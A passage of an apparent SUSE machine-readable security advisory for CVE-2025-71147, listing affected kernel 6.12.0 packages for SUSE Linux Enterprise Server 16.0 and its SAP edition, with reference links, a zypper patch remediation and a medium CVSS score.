"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71147",
"url": "https://www.suse.com/security/cve/CVE-2025-71147"
},
{
"category": "external",
"summary": "SUSE Bug 1257158 for CVE-2025-71147",
"url": "https://bugzilla.suse.com/1257158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
